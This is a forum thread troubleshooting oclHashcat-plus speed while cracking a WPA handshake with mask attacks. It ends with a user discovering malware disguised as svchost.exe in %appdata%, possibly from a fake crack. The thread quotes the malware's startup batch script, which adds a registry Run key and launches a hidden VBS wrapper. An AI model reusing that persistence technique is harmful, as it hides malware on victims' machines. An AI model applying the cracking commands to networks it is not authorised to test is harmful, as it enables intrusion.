Quick question: did you try actually starting cracking anew, not restoring(by that I mean NOT using restore file, starting from scratch) ?
Also, what if you're not using dictionaries?
Try some kind of mask, for example, -1 ?l?d ?1?1?1?1?1?1?1?1

Can you provide full command line parameters?
This will ensure the closest test conditions possible.

Tried everything... Like this for example:
oclHashcat-plus64.exe --hash-type 2500 --gpu-accel 16 --gpu-loops 128 --attack-mode 3 D:\crack.hccap ?d?d?d?d?d?d?d?d

why are you using --gpu-loops 128? 128 is the default, you do not need to manually specify that. and you will not get full acceleration using the default of 128, you need to use 4096 for full acceleration.

Can't reproduce for NV cards.

With --gpu-accel 16 --gpu-loops 128 I had perfect balance between cracking speed and screen responsiveness (no lag at all). Now if I set --gpu-loops 4096 speed does rises to 91k but computer is unusable. That was the thing I love about oclHashcat-plus v0.13 (or Catalyst 13.1), nos screen lag with my settings and with all other versions there was (and speed was the same). I don't know what happened after playing Crysis3, but so far, only solution is to finish playing the game and restore system image before game Sad

PS and if I delete --gpu-loops 128 from parameters (since it is a default) speed drops to 21k Smile

Found a solution to my problem. Something was loading process svchost.exe *32 (user process) which was located in %appdata%\ActiveX\svchost.exe. As soon as I killed it speed was back to normal. This is the script that was loading at system start:

@echo off
%windir%\system32\taskkill.exe /im svchost.exe
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v ActiveXService /d "wscript \"%appdata%\ActiveX\invis.vbs\" \"%appdata%\ActiveX\svchost.exe\"" /f
start /b "a" "%appdata%\ActiveX\svchost.exe"

I'm still investigating what created this...

Joking apart, there is a fake crack out there. This post is in Spanish (I was not able to find anything in English) but sure you know how to read it in English Tongue
